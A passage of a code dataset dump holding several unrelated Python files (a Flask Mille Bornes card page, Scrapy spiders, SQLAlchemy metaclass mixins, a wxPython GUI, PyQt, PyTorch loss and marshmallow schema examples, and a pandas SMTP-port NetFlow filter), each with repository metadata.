ans","repo_name":"maciejdomagala/thegreatUpsolving","sub_path":"various/MissingNumber.py","file_name":"MissingNumber.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17270188036","text":"from moteur import ( etapes, parades, attaques, bottes, cartes, getNombreTotalCartes, \n    mapClassCarteConcerteToDictObjectsCarteConcrete)\nfrom moteur.classes import *\nfrom flask import Blueprint, render_template, g, url_for\nfrom milleBornes import makeTransparentEmptyImageByHeight, resizeImage, getFileNameFromObjectCarte\n\n#from lorem_text import lorem\n\nbp = Blueprint('listeCartes', __name__)\n\n# Miscellaneous computations\n# --------------\n\ndef getTitle():\n    title = url_for('listeCartes.listeCartes')\n    title = title.split('/')\n    title = title[len(title)-1]\n    title = title.replace('-', ' ')\n    return title\n\n\n\ndef maxLen(typeCarte): # typeCarte is one of the concrete subclasses of Carte: Etape, Parade ...\n    #mapping={Attaque: attaques, Parade: parades, Etape: etapes, Botte: bottes}\n    res=0\n    for c in mapClassCarteConcerteToDictObjectsCarteConcrete[typeCarte].values():\n        res=max(res,len(c.nom))\n    return res+1\n\n\nclass CarteSansNomSansNombre(PasDeCarte):\n    def __init__(self):\n        self._nom = ' ' # a space combined with the CSS white-space: pre; to display empty content that takes up the width of one letter\n        self._nombre = ''\n\n\n# list of dicts to put into g so the page is built without any hard-coded string -> variable: html\n# id attribute of the
    HTML display    list of Carte objects of the type, in display order\n# [ { nomId: 'attaques', nomHTML: \"Attaques\", cartes: [ obj(FeuRouge), obj(LimitationDeVitesse)]}, ... the other card types ]\n\n_ordreCartes= {\n    Attaque: (cartes[FeuRouge], cartes[LimitationDeVitesse], cartes[Accident], cartes[Creve], cartes[PanneEssence]),\n    Parade: (cartes[FeuVert], cartes[FinDeLimitation], cartes[Reparation], cartes[RoueDeSecours], cartes[Essence]),\n    Botte: (cartes[Prioritaire], CarteSansNomSansNombre(), cartes[AsDuVolant], cartes[Increvable], cartes[Citerne]),\n    Etape: (cartes[Etape25], cartes[Etape50], cartes[Etape75], cartes[Etape100], cartes[Etape200]),\n}\n\nordreCartes={}\nfor k in _ordreCartes.keys():\n    l=[]\n    #scale=0.4\n    hauteur=45\n    for v in _ordreCartes[k]:\n        d = {'carte': v, \n             'image': makeTransparentEmptyImageByHeight(hauteur) if isinstance(v,CarteSansNomSansNombre) else resizeImage(v,hauteur) }\n        l.append(d)\n    ordreCartes.update({k: l})\n\ndel _ordreCartes,k,l,v,d, hauteur\n\nordreTypes=(Attaque, Parade, Botte, Etape)\nnomTypes = {\n    Attaque: {'nomId': 'attaques', 'nomHTML': \"Attaques\"},\n    Parade: {'nomId': 'parades', 'nomHTML': \"Parades\"},\n    Botte: {'nomId': 'bottes', 'nomHTML': \"Bottes\"},\n    Etape: {'nomId': 'etapes', 'nomHTML': \"Bornes\"},\n}\n\nhtml=[]\nfor tc in ordreTypes:\n    html.append({'nomId': nomTypes[tc]['nomId'],\n                 'nomHTML': nomTypes[tc]['nomHTML'],\n                 'cartes': ordreCartes[tc],\n                 'maxLen': maxLen(tc),\n                 })\n\ndel ordreCartes, ordreTypes, nomTypes, tc\n\n\n\n\n@bp.route('/Liste-des-cartes')\ndef listeCartes(): \n    g.html=html\n    #debug: getFileNameFromObjectCarte(html[0]['cartes'][0]['carte'])\n    g.title = getTitle()\n    g.total = getNombreTotalCartes()\n\n    return render_template('listeCartes.j2', getFileNameFromObjectCarte=getFileNameFromObjectCarte)\n","repo_name":"jcd717/1000Bornes","sub_path":"milleBornes/listeCartes.py","file_name":"listeCartes.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74093625688","text":"import re\nfrom datetime import datetime\n\nfrom scrapy import Spider\nfrom scrapy.http import TextResponse\n\nfrom html_parse.productdata import parse as product_data_html_parse\nfrom table_definitions.base import Session\nfrom table_definitions.category import Category\nfrom table_definitions.page import Page\nfrom table_definitions.product import Product\nfrom table_definitions.productdata import ProductData\n\n# https://realpython.com/python-web-scraping-practical-introduction/\n# pip install requests BeautifulSoup4\n# pip install Scrapy\n# pip install sqlalchemy\n\n\nclass CrawlCategory(Spider):\n    \"\"\"\n    This crawler takes a category for example,\n    (https://www.bestwaywholesale.co.uk/soft-drinks) and saves the various\n    information required\n    \"\"\"\n\n    name = \"category\"\n\n    # SQLAlchemy category object\n    catObject = None\n\n    # SQLAlchemy session object\n    dbSession = None\n\n    def parse(self, response: TextResponse):\n        # getting the data required to store in the pages table\n        r_url = response.url\n        r_page = response.text\n        r_time = datetime.now()\n        print(__file__, \"CrawCategory.parse()\", \"scraping for pages: {}\".format(r_url))\n        # create SQLAlchemy page object\n        pge = Page(\n            url=r_url, html=r_page, date=r_time, category=CrawlCategory.catObject\n        )\n\n        # add page object\n        CrawlCategory.dbSession.add(pge)\n\n        # calculating the url for the next page\n        next_page = response.css(\"li.next a\").attrib[\"href\"]\n        if next_page is not 
None:\n yield response.follow(next_page, callback=self.parse)\n\n\nclass crawlProduct(Spider):\n \"\"\"\n This crawler scrapes individual product pages and extracts appropriate information\n \"\"\"\n\n name = \"product\"\n dbSession = None\n\n def parse(self, response: TextResponse):\n # getting data for productdata object\n r_url = response.url\n r_page = response.text\n r_time = datetime.now()\n\n print(\"scraping for productData: {}\".format(r_url))\n\n dct = product_data_html_parse(response.css(\".prodtable\").get())\n remove = False\n try:\n # get price\n r_price = dct[\"RSP\"]\n r_price = \"\".join(\n re.findall(r\"([\\d,.])\", r_price)\n ) # use regex to remove the currency symbol\n\n # get brand\n r_brand = dct['Brand']\n\n # get item name\n r_itemname = response.css(\".productpagedetail-inner .prodname::text\").get()\n\n # get item size\n r_size = dct['Pack Size']\n # r_size = \"\".join(re.findall(r\"([\\d,.])\", r_size))\n except KeyError as e:\n print(e)\n print(\"Missing data, remove \")\n remove = True\n\n # since product and productdata has a 1 to 1 relationship, the url of product and productdata is the same\n # iterate thorugh the product table, find the matching url and create the productdata sqlalchemy object with the product object\n Product_table = crawlProduct.dbSession.query(Product).all()\n for i in Product_table:\n # if there is a matcging url, we found the matching product\n if i.url == r_url:\n # check if any of the scraped data has none values. if true, delete the product entry\n if remove:\n crawlProduct.dbSession.query(Product).filter(\n Product.id == i.id\n ).delete()\n else:\n product_data_object = ProductData(\n url=r_url,\n html=r_page,\n date=r_time,\n price=r_price,\n brand=r_brand,\n itemName=r_itemname,\n size=r_size,\n product=i,\n )\n crawlProduct.dbSession.add(product_data_object)\n crawlProduct.dbSession.commit()\n","repo_name":"zayd62/final-year-project","sub_path":"scrapers.py","file_name":"scrapers.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40453283136","text":"import re\nimport sqlalchemy as sa\nfrom sqlalchemy import inspect\nfrom sqlalchemy.orm.decl_api import DeclarativeMeta, declared_attr\nfrom sqlalchemy.schema import _get_table_key\nfrom typing import Any\nfrom .utils import has_primary_key\n\ncamelcase_re = re.compile(r\"([A-Z]+)(?=[a-z0-9])\")\n\n\ndef camel_to_snake_case(name):\n def _join(match):\n word = match.group()\n if len(word) > 1:\n return (\"_%s_%s\" % (word[:-1], word[-1])).lower()\n return \"_\" + word.lower()\n\n return camelcase_re.sub(_join, name).lstrip(\"_\")\n\n\ndef should_set_tablename(cls):\n \"\"\"Determine whether ``__tablename__`` should be automatically generated\n for a model.\n\n * If no class in the MRO sets a name, one should be generated.\n * If a table prefix (__table_prefix__) is specified,\n * If a declared attr is found, it should be used instead.\n * If a name is found, it should be used if the class is a mixin, otherwise\n one should be generated.\n * Abstract models should not have one generated.\n\n Later, :meth:`._BoundDeclarativeMeta.__table_cls__` will determine if the\n model looks like single or joined-table inheritance. 
If no primary key is\n    found, the name will be unset.\n    \"\"\"\n    if cls.__dict__.get(\"__abstract__\", False) or not any(\n        isinstance(b, DeclarativeMeta) for b in cls.__mro__[1:]\n    ):\n        return False\n\n    for base in cls.__mro__:\n        if \"__tablename__\" not in base.__dict__:\n            continue\n        if isinstance(base.__dict__[\"__tablename__\"], declared_attr):\n            return False\n        if \"__table_prefix__\" in base.__dict__:\n            return True\n        return not (\n            base is cls\n            or base.__dict__.get(\"__abstract__\", False)\n            or not isinstance(base, DeclarativeMeta)\n        )\n\n    return True\n\n\nclass AutoBigIntegerIdentifierMetaMixin(object):\n    \"\"\"\n    A meta class for auto-generating `BigInteger` primary key columns on models.\n    \"\"\"\n\n    def __init__(\n        cls, classname: str, bases: tuple[type[Any], ...], dict_: dict[str, Any]\n    ) -> None:\n        \"\"\" \"\"\"\n        #: Check to see if the class has at least one primary key defined. If\n        #: not, automatically generate one.\n        has_primary = has_primary_key(cls)\n\n        if not has_primary:\n            # cls.__dict__ is a read-only mappingproxy, so the generated column is\n            # attached with setattr() and mirrored into dict_ for the declarative\n            # scan; sharing one Column avoids two diverging \"id\" definitions.\n            id_column = sa.Column(\"id\", sa.BigInteger, nullable=False, primary_key=True)\n            id_column._creation_order = 1\n            setattr(cls, \"id\", id_column)\n            dict_[\"id\"] = id_column\n        super().__init__(classname, bases, dict_)\n\n\nclass BindMetaMixin(object):\n    \"\"\" \"\"\"\n\n    def __init__(\n        cls, classname: str, bases: tuple[type[Any], ...], dict_: dict[str, Any]\n    ) -> None:\n        bind_key = dict_.pop(\"__bind_key__\", None) or getattr(cls, \"__bind_key__\", None)\n\n        super().__init__(classname, bases, dict_)\n\n        if bind_key is not None and getattr(cls, \"__table__\", None) is not None:\n            cls.__table__.info[\"bind_key\"] = bind_key\n\n\nclass NameMetaMixin(object):\n    \"\"\" \"\"\"\n\n    def __init__(\n        cls, classname: str, bases: tuple[type[Any], ...], dict_: dict[str, Any]\n    ) -> None:\n        if should_set_tablename(cls):\n            table_name = camel_to_snake_case(cls.__name__)\n            #: If a table prefix is specified, overwrite the `table_name` with\n            #: one that contains both the prefix and the name of the table.\n            if \"__table_prefix__\" in cls.__dict__:\n                table_prefix = camel_to_snake_case(cls.__table_prefix__)\n                table_name = f\"{table_prefix}{table_name}\"\n            cls.__tablename__ = table_name\n\n        super().__init__(classname, bases, dict_)\n\n        # __table_cls__ has run at this point\n        # if no table was created, use the parent table\n        if (\n            \"__tablename__\" not in cls.__dict__\n            and \"__table__\" in cls.__dict__\n            and cls.__dict__[\"__table__\"] is None\n        ):\n            del cls.__table__\n\n    def __table_cls__(cls, *args, **kwargs):\n        \"\"\"This is called by SQLAlchemy during mapper setup. 
It determines the\n        final table object that the model will use.\n\n        If no primary key is found, that indicates single-table inheritance,\n        so no table will be created and ``__tablename__`` will be unset.\n        \"\"\"\n        # check if a table with this name already exists\n        # allows reflected tables to be applied to model by name\n        key = _get_table_key(args[0], kwargs.get(\"schema\"))\n\n        if key in cls.metadata.tables:\n            return sa.Table(*args, **kwargs)\n\n        # if a primary key or constraint is found, create a table for\n        # joined-table inheritance\n        for arg in args:\n            print(arg)\n            if (isinstance(arg, sa.Column) and arg.primary_key) or isinstance(\n                arg, sa.PrimaryKeyConstraint\n            ):\n                return sa.Table(*args, **kwargs)\n\n        # if no base classes define a table, return one\n        # ensures the correct error shows up when missing a primary key\n        for base in cls.__mro__[1:-1]:\n            if \"__table__\" in base.__dict__:\n                break\n        else:\n            return sa.Table(*args, **kwargs)\n\n        # single-table inheritance, use the parent tablename\n        if \"__tablename__\" in cls.__dict__:\n            del cls.__tablename__\n\n\nclass DefaultMeta(NameMetaMixin, BindMetaMixin, DeclarativeMeta):\n    pass\n\n\nclass Model(object):\n    \"\"\"Base class for SQLAlchemy declarative base model.\n\n    To define models, subclass :attr:`db.Model `, not this\n    class. To customize ``db.Model``, subclass this and pass it as\n    ``model_class`` to :class:`SQLAlchemy`.\n    \"\"\"\n\n    #: Query class used by :attr:`query`. Defaults to\n    # :class:`SQLAlchemy.Query`, which defaults to :class:`BaseQuery`.\n    query_class = None\n\n    #: Convenience property to query the database for instances of this model\n    # using the current session. Equivalent to ``db.session.query(Model)``\n    # unless :attr:`query_class` has been changed.\n    query = None\n\n    def __repr__(self):\n        identity = inspect(self).identity\n        if identity is None:\n            pk = \"(transient {})\".format(id(self))\n        else:\n            pk = \", \".join(str(value) for value in identity)\n        return \"<{} {}>\".format(type(self).__name__, pk)\n","repo_name":"alkaemic/philosophy","sub_path":"philosophy/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26259159365","text":"'''\r\n김태환\r\n202395012\r\nProblem analysis\r\n    Write a program that counts the frequency of the values that come up when a die is thrown; count how many times each of the values 1,2,3,4,5,6 appears\r\n    variable: die (dice)\r\nAlgorithm\r\n    import the random module\r\n    repeat, tallying each rolled value\r\n    while True:\r\n        dice=random.randint(1,6)\r\n        \r\n'''\r\nimport random\r\ncnt=0\r\none=0\r\ntwo=0\r\nthree=0\r\nfour=0\r\nfive=0\r\nsix=0\r\nwhile True:\r\n    dice=random.randint(1,6)\r\n    cnt=cnt+1\r\n    if dice==1:\r\n        one=one+1\r\n    elif dice==2:\r\n        two=two+1\r\n    elif dice==3:\r\n        three=three+1\r\n    elif dice==4:\r\n        four=four+1\r\n    elif dice==5:\r\n        five=five+1\r\n    else:\r\n        six=six+1\r\n    if cnt==1000:\r\n        break\r\n    \r\nprint(\"주사위가 1인 경우\",one)\r\nprint(\"주사위가 2인 경우\",two)\r\nprint(\"주사위가 3인 경우\",three)\r\nprint(\"주사위가 4인 경우\",four)\r\nprint(\"주사위가 5인 경우\",five)\r\nprint(\"주사위가 6인 경우\",six)\r\n","repo_name":"tkdwk1/SW","sub_path":"sw_fin202395012/fin_ex4_202395012.py","file_name":"fin_ex4_202395012.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10373329226","text":"import wx\nfrom wx import adv\nimport nmx_reporte\n\n\nclass VentanaNmx(wx.Frame):\n\tdef __init__(self, *args, **kw):\n\t\tsuper().__init__(*args, **kw)\n\t\tpnl = wx.Panel(self)\n\t\tst = 
wx.StaticText(pnl, label=\"Fecha de inicio:\\t\\t\\tNMX179 by FJGO\\t\\t\\tFecha Fin:\", pos=wx.Point(10,10), size=wx.Size(550, 20))\n\t\tself.cal1 = adv.CalendarCtrl(pnl, pos=wx.Point(10,50))\n\t\tself.cal2 = adv.CalendarCtrl(pnl, pos=wx.Point(270,50))\n\t\tbot = wx.Button(pnl, label=\"Iniciar Reporte\", pos=wx.Point(10, 250))\n\t\tself.Bind(wx.EVT_BUTTON, self.OnButton, bot)\n\n\tdef OnButton(self, event):\n\t\tresp = wx.MessageBox(\"Se va a iniciar el proceso\", 'NMX179', wx.YES | wx.NO | wx.ICON_ASTERISK)\n\t\tif resp == wx.NO:\n\t\t\tprint(\"Cancelado\")\n\t\telse:\n\t\t\tfecha_ini = self.cal1.GetDate()\n\t\t\tfecha_fin = self.cal2.GetDate()\n\n\t\t\tif fecha_fin > fecha_ini:\n\t\t\t\tdia_ini = fecha_ini.GetDay()\n\t\t\t\tmes_ini = fecha_ini.GetMonth() + 1 #Add one because the month is zero-based\n\t\t\t\tanio_ini = fecha_ini.GetYear()\n\n\t\t\t\tdia_fin = fecha_fin.GetDay()\n\t\t\t\tmes_fin = fecha_fin.GetMonth() + 1 #Add one because the month is zero-based\n\t\t\t\tanio_fin = fecha_fin.GetYear()\n\n\t\t\t\tresp = False\n\t\t\t\tresp = nmx_reporte.Inicia_Reporte(dia_ini, mes_ini, anio_ini, dia_fin, mes_fin, anio_fin)\n\t\t\t\tif resp == True:\n\t\t\t\t\twx.MessageBox(\"El reporte ha finalizado.\", style=wx.ICON_ASTERISK)\n\t\t\t\telse:\n\t\t\t\t\twx.MessageBox(\"Se ha producido un error durante el reporte\", style=wx.ICON_ERROR)\n\t\t\telse:\n\t\t\t\twx.MessageBox(\"Las fecha final debe de ser mayor a fecha de inicio.\", style=wx.ICON_EXCLAMATION)\n\ndef IniciaVentana():\n\tapp = wx.App()\n\tfrm = VentanaNmx(None, title = \"NMX179 by FJGO\", size=wx.Size(550,350))\n\tfrm.Show()\n\tapp.MainLoop()","repo_name":"frankone11/NMX179","sub_path":"nxm_ventana.py","file_name":"nxm_ventana.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25892227228","text":"\n# from django.contrib import admin\nfrom django.urls import path\nfrom .views import index, by_rubric, BbCreateView, add, add_save\n# app_name = 'bboard'\nurlpatterns = [\npath ('/', by_rubric, name='by_rubric'),\npath ('', index, name='index'),\npath ('add/', BbCreateView.as_view(), name='add'),\npath ('add/save/', add_save, name='add_save'),\npath ('add/', add, name='add'),\n\n]\n","repo_name":"NETsharing/DjangoDronov","sub_path":"bboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7772532492","text":"#!/usr/bin/python3\n\"\"\"\ntakes in a URL and an email, sends a POST request to the passed URL\nwith the email as a parameter, and displays the body of the\nresponse (decoded in utf-8)\n\"\"\"\nfrom sys import argv\nimport urllib.request as req\nimport urllib.parse as parse\n\nif __name__ == \"__main__\":\n    url = argv[1]\n    values = {'email': argv[2]}\n    email = parse.urlencode(values).encode(\"ascii\")\n\n    request = req.Request(url, email)\n    with req.urlopen(request) as response:\n        page = response.read()\n        print(page.decode(\"utf-8\"))\n","repo_name":"haru-voster/alx-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"17293389200","text":"import sys\nimport pickle\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\nclass Ass():\n    def __init__(self):\n        super().__init__()\n\n    def 
hi(self,lv,s,la):\n        global level,score,lang\n        level = lv\n        score = s\n        lang = la\n\nclass LogInDialog(QDialog):\n    def __init__(self):\n        super().__init__()\n        self.setupUI()\n        self.name = None\n\n    def setupUI(self):\n        self.setGeometry(1100, 200, 300, 100)\n        self.setWindowTitle(\"Sign In\")\n\n        label1 = QLabel(\"UserName: \")\n\n        self.lineEdit1 = QLineEdit()\n        self.pushButton1= QPushButton(\"Add\")\n        self.pushButton1.clicked.connect(self.pushButtonClicked)\n\n        layout = QGridLayout()\n        layout.addWidget(label1, 0, 0)\n        layout.addWidget(self.lineEdit1, 0, 1)\n        layout.addWidget(self.pushButton1, 0, 2)\n\n        self.setLayout(layout)\n\n    def pushButtonClicked(self):\n        self.name = self.lineEdit1.text()\n        self.close()\n\nclass MyWindow(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.setupUI()\n        self.dbfilename = 'hihihi'\n        self.scoredb = []\n        self.readScoreDB()\n        self.showScoreDB()\n\n    def setupUI(self):\n        self.setGeometry(800, 200, 300, 300)\n        self.setWindowTitle(\"Records\")\n        self.pushButton = QPushButton(\"Register\")\n        self.pushButton.clicked.connect(self.pushButtonClicked)\n        self.label = QLabel()\n\n        layout = QVBoxLayout()\n        layout.addWidget(self.pushButton)\n        layout.addWidget(self.label)\n\n        self.setLayout(layout)\n\n    def pushButtonClicked(self):\n        dlg = LogInDialog()\n        dlg.exec_()\n        name = dlg.name\n        result = {'Name' : 'leejung', 'Language' : 'korr', 'Level' : 'expert', 'Score': 77}\n        self.scoredb += [result]\n        self.showScoreDB()\n\n    def showScoreDB(self):\n        keyname = 'Score'\n        msg = ''\n        result = {'Name': 'leejung', 'Language': 'korr', 'Level': 'expert', 'Score': 77}\n        self.scoredb4=[]\n        self.scoredb4 += [result]\n        for p in sorted(self.scoredb4, key=lambda person: person[keyname]):\n            for attr in p:\n                msg += attr + \" : \" + str(p[attr]) + \" , \"\n            msg += \"\\n\"\n        self.label.setText(msg)\n        self.writeScoreDB()\n    def readScoreDB(self):\n        try:\n            fH = open(self.dbfilename, 'rb')\n        except FileNotFoundError as e:\n            self.scoredb4 = []\n            return\n\n        try:\n            self.scoredb = pickle.load(fH)\n        except:\n            pass\n        else:\n            pass\n        fH.close()\n\n\n    # write the data into person db\n    def writeScoreDB(self):\n        fH = open(self.dbfilename, 'wb')\n        pickle.dump(self.scoredb4, fH)\n        fH.close()\n\n","repo_name":"JungHyun4/DooDooDooDoo","sub_path":"record_test.py","file_name":"record_test.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41215126277","text":"from app import app\r\nfrom flask import render_template\r\nfrom utils import get_db_connection\r\nfrom models.profile_model import *\r\nfrom models.event_model import get_event_info, get_participants, get_user_events_only_id\r\nfrom controllers.functions import *\r\n\r\n\r\n@app.route('/profile', methods=['GET', 'POST'])\r\ndef profile():\r\n    conn = get_db_connection()\r\n\r\n    # Initial parameter setup\r\n    rate_window = False\r\n    event_id = 0\r\n\r\n    # Initial session setup\r\n    if 'status_user' not in session:\r\n        session['status_user'] = []\r\n\r\n    # Cancel the user's registration for the event\r\n    if request.values.get('cancel'):\r\n        event_id = int(request.values.get('cancel'))\r\n        to_cancel(conn, session['user_id'], event_id)\r\n\r\n    # User rates an event\r\n    elif request.values.get('to_rate'):\r\n        session['remember_id_'] = int(request.values.get('to_rate'))\r\n        rate_window = True\r\n\r\n    # View detailed information about the event\r\n    elif request.values.get('choice_event'):\r\n        event_id = 
int(request.values.get('choice_event'))\r\n\r\n    # Submit a review of the event\r\n    if request.values.get('to_rate_event'):\r\n        rate_box = request.values.get('rate_box')\r\n        rate_text = request.values.get('rate_text')\r\n        rate = \"Оценка: \" + rate_box + \" Комментарий: \" + rate_text\r\n        if 'remember_id_' in session:\r\n            to_rate(conn, session['remember_id_'], rate, session['user_id'])\r\n            session.pop('remember_id_', None)\r\n\r\n    # Clear the search filters\r\n    if request.form.get('clear'):\r\n        status = []\r\n        session['status_user'] = []\r\n    else:\r\n        status = request.form.getlist(\"Статус мероприятия\")\r\n\r\n    # Search events by the filters\r\n    if request.form.get('search'):\r\n        session['status_user'] = status\r\n\r\n    df_status = get_status(conn, session['user_id'])\r\n    df_event = get_user_events(conn, session['user_id'])\r\n    event_info = get_event_info(conn, event_id)\r\n    df_participants = get_participants(conn)\r\n    df_event = df_event[((df_event['status_name'].isin(session['status_user'])) | (len(session['status_user']) == 0))]\r\n\r\n    # Sorting options\r\n    title = request.values.get('select-list')\r\n    if title == 'Отсортировать по алфавиту ↓':\r\n        sort = 'event_name DESC'\r\n        df_event = get_user_events_sort(conn, session['user_id'], sort)\r\n    elif title == 'Отсортировать по алфавиту ↑':\r\n        sort = 'event_name'\r\n        df_event = get_user_events_sort(conn, session['user_id'], sort)\r\n    elif title == 'Отсортировать по дате ↓':\r\n        sort = 'strftime(\"%Y-%m-%d\", beginning_date) DESC'\r\n        df_event = get_user_events_sort(conn, session['user_id'], sort)\r\n    elif title == 'Отсортировать по дате ↑':\r\n        sort = 'strftime(\"%Y-%m-%d\", beginning_date)'\r\n        df_event = get_user_events_sort(conn, session['user_id'], sort)\r\n    elif title == 'Отсортировать по статусу ↓':\r\n        sort = 'status_id DESC'\r\n        df_event = get_user_events_sort(conn, session['user_id'], sort)\r\n    elif title == 'Отсортировать по статусу ↑':\r\n        sort = 'status_id'\r\n        df_event = get_user_events_sort(conn, session['user_id'], sort)\r\n    elif title == 'Рекомендуемая сортировка':\r\n        df_event = get_user_events(conn, session['user_id'])\r\n\r\n    df_user_event = get_user_events_only_id(conn, session['user_id']).values.tolist()\r\n\r\n    list_title = init_list_title()\r\n\r\n    html = render_template(\r\n        'profile.html',\r\n        events=df_event,\r\n        status_list=df_status,\r\n        rate_window=rate_window,\r\n        event_info=event_info,\r\n        participants_list=df_participants,\r\n        len=len,\r\n        title=title,\r\n        user_event_list=df_user_event,\r\n        list_title=list_title\r\n    )\r\n\r\n    return html\r\n","repo_name":"NiShiGara/SIT-general-lab-maintenance","sub_path":"controllers/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":4254,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34317371615","text":"'''\nFor UGR Data, filter SMTP related records\nport 25, 587, 465\n'''\n\nimport pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser(description = \"Filters SMTP related records from UGR Netflow data\")\nparser.add_argument('-f', metavar='filename', type=str, help='path to csv file')\nparser.add_argument('-o', metavar='filename', type=str, help='path to out csv file')\nargs = parser.parse_args()\n\nfilename = vars(args)['f']\noutname = vars(args)['o']\nSMTP_ports = [25, 587, 465]\n\nchunksize = 10 ** 6\ndf = None\ncounter = 0\nfor chunk in pd.read_csv(filename, chunksize=chunksize):\n\tchunk = chunk[(chunk['sp'].isin(SMTP_ports)) | (chunk['dp'].isin(SMTP_ports))]\n\tif 
df is None:\n\t\tdf = chunk\n\telse:\n\t\t# DataFrame.append was removed in pandas 2.0; concat is the supported way\n\t\tdf = pd.concat([df, chunk])\n\tcounter += 1\n\tprint(\"[+] {} chunks read\".format(counter))\ndf.to_csv(outname, index=False)","repo_name":"raynoldng/UGR_Experiments","sub_path":"utils/filter_SMTP_csv.py","file_name":"filter_SMTP_csv.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1992661215","text":"import os\n\nimport pytest\n\nfrom db2docker.backends.base import DBDockerBackend\nfrom db2docker.db2d import db2d\n\n\nclass DummyDBDockerBackend(DBDockerBackend):\n\n    called = False\n\n    def run(self):\n        DummyDBDockerBackend.called = True\n\n\ndef test_db2d(mocker, tmpdir):\n    assert list(db2d.types.keys()) == [\"mariadb\"]\n\n    db2d.register(\"dummy\", DummyDBDockerBackend)\n    assert sorted(db2d.types.keys()) == [\"dummy\", \"mariadb\"]\n\n    foodir = tmpdir.mkdir(\"foo\")\n    sqlfile = os.path.join(str(foodir), \"bar.sql\")\n\n    with open(sqlfile, \"w\") as f:\n        f.write(\"some sql\")\n    db2d.run(sqlfile, \"--container-type=dummy\", \"--data=/some/data\")\n    assert DummyDBDockerBackend.called is True\n\n    with pytest.raises(SystemExit):\n        db2d.run(sqlfile, \"--container-type=DOESNOTEXIST\", \"--data=/some/data\")\n","repo_name":"phlax/db2docker","sub_path":"tests/db2d.py","file_name":"db2d.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24327946411","text":"\nimport torch\nfrom torch.nn import L1Loss\nfrom torch import nn\n\ninputs = torch.tensor([1, 2, 3], dtype=torch.float32)\ntargets = torch.tensor([1, 2, 5], dtype=torch.float32)\n\nprint(\"inputs\", inputs)\nprint(\"targets: \", targets)\n\ninputs = torch.reshape(inputs, (1, 1, 1, 3))\ntargets = torch.reshape(targets, (1, 1, 1, 3))\n\nloss = L1Loss()\nresult = loss(inputs, targets)\nprint(\"LOSS-mean \", result)\n\nloss = L1Loss(reduction='sum')\nresult = loss(inputs, targets)\nprint(\"LOSS-sum\", result)\n\nloss_mse = nn.MSELoss()\nresult = loss_mse(inputs, targets)\nprint(\"LOSS-MSE\", result)\n\nx = torch.tensor([0.1, 0.2, 0.3])\ny = torch.tensor([1])\nx = torch.reshape(x, (1, 3))\nloss_cross = nn.CrossEntropyLoss()\nresult_cross = loss_cross(x, y)\nprint(\"LOSS-cross\", result_cross)\n","repo_name":"yubaoliu/AIDevLib","sub_path":"Pytorch/test/nn_loss.py","file_name":"nn_loss.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29144563660","text":"from marshmallow import Schema, validates_schema, ValidationError\nfrom marshmallow.fields import String, Integer, Boolean, List\nfrom marshmallow.validate import Regexp\n\n\nclass BaseSchema(Schema):\n    pub_connect_uri = String(\n        missing='tcp://127.0.0.1:7700',\n        validate=Regexp('^tcp://[^:]+:\\d+'))\n    sub_connect_uri = String(\n        missing='tcp://127.0.0.1:7701',\n        validate=Regexp('^tcp://[^:]+:\\d+'))\n    loglevels = List(String())\n\n\nclass PinSchema(BaseSchema):\n    pin = Integer(required=True)\n\n\nclass ProxySchema(BaseSchema):\n    pub_bind_uri = String(\n        required=True,\n        missing='tcp://127.0.0.1:7700',\n        validate=Regexp('^tcp://[^:]+:\\d+'))\n    sub_bind_uri = String(\n        required=True,\n        missing='tcp://127.0.0.1:7701',\n        validate=Regexp('^tcp://[^:]+:\\d+'))\n\n\nclass KeypadSchema(BaseSchema):\n    device = String()\n    device_name = String()\n    grab = Boolean(missing=True)\n\n    @validates_schema\n    def validate_device(self, data):\n        if all(data.get(option) is 
